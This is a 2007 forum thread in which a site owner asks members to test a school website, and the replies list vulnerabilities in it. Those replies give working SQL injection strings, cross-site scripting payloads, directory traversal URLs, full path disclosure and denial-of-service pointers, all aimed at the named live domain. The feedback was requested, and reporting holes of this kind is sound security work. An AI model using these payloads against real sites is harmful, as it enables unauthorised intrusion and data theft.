allyant Posted September 16, 2007 Share Posted September 16, 2007 Hey, Just want users to test out my school site that I helped program: http://www.deanschs.co.uk/controller.php?do=get&mode=embedded&id=1 Any feedback is welcome. Link to comment Share on other sites More sharing options...
kathas Posted September 16, 2007 Share Posted September 16, 2007 SQL injection: http://www.deanschs.co.uk/controller.php?do=get&mode=showindex&id=3&gid=1234%20or%201=1 http://www.deanschs.co.uk/controller.php?do=get&mode=showindex&id=3&gid= SQL injection: http://www.deanschs.co.uk/controller.php?do=get&mode=showindex&id=' http://www.deanschs.co.uk/controller.php?do=get&mode=showindex&id=1 or 1=1 Full path disclosure + i can include any file on your server (Big hole): http://www.deanschs.co.uk/controller.php?do=./../&mode=index&id=1 Delete this file: http://www.deanschs.co.uk/test.php Good way to DoS the site: http://www.deanschs.co.uk/controller.php?do=account&mode=login Link to comment Share on other sites More sharing options...
agentsteal Posted September 16, 2007 Share Posted September 16, 2007 Cross Site Scripting: http://www.deanschs.co.uk/controller.php?do=get&mode=embedded&id=<marquee><h1>vulnerable</marquee> Cross Site Scripting: http://www.deanschs.co.uk/test.php?<marquee><h1>vulnerable</marquee> Cross Site Scripting: There is Cross Site Scripting if the Expect header contains code. Cross Site Scripting: There is Cross Site Scripting when you register if the fields contain code. Directory Transversal: http://www.deanschs.co.uk/controller.php?mode=../test.php DOS: http://www.deanschs.co.uk/module/account/login.php/ Drop Down Menu: If you edit the drop down menus in the header you can submit arbitrary values. Full Path Disclosure: http://www.deanschs.co.uk/controller.php Full Path Disclosure: http://www.deanschs.co.uk/controller.php?do[] Full Path Disclosure: http://www.deanschs.co.uk/controller.php?do=get&mode=embedded&id[] Full Path Disclosure: http://www.deanschs.co.uk/controller.php?do=get&mode=showindex&id=1&gid[] Full Path Disclosure: http://www.deanschs.co.uk/controller.php?mode=../test.php Full Path Disclosure: http://www.deanschs.co.uk/controller.php?mode[] Full Path Disclosure: Parse error: parse error, unexpected '}' in /homepages/4/d166579989/htdocs/controller.php on line 12 SQL Error: http://www.deanschs.co.uk/controller.php?do=get&mode=embedded SQL Error: http://www.deanschs.co.uk/module/get/showindex.php SQL Error: http://www.deanschs.co.uk/module/get/showindexsub.php SQL Error: http://www.deanschs.co.uk/module/get/showpage.php SQL Injection: http://www.deanschs.co.uk/controller.php?do=get&mode=showindex&id=1 AND 1=1 http://www.deanschs.co.uk/controller.php?do=get&mode=showindex&id=1 AND 1=2 SQL Injection: http://www.deanschs.co.uk/controller.php?do=get&mode=showindex&id=3&gid=1 AND 1=1 http://www.deanschs.co.uk/controller.php?do=get&mode=showindex&id=3&gid=1 AND 1=2 Link to comment Share on other sites More sharing options...
allyant Posted September 16, 2007 Author Share Posted September 16, 2007 Thanks for that I have a lot of coding to do Looks like someone took it down too, can that person PM me and tell me what they done? Link to comment Share on other sites More sharing options...
sjames06 Posted September 26, 2007 Share Posted September 26, 2007 Thanks all for your time in showing these errors to me. I do find it amusing that the author of this thread is trying to claim the site as his work, the footer does say that it was created as part of a AH Computing Project by Scott James, who is infact me. Once again, thank you for showing me these holes. Scott Link to comment Share on other sites More sharing options...
sjames06 Posted September 26, 2007 Share Posted September 26, 2007 Sorry for double post but cant edit one above. I would also like any feedback aswell to help with the project. I can be emailed at admin@deanschs.co.uk Link to comment Share on other sites More sharing options...
Recommended Posts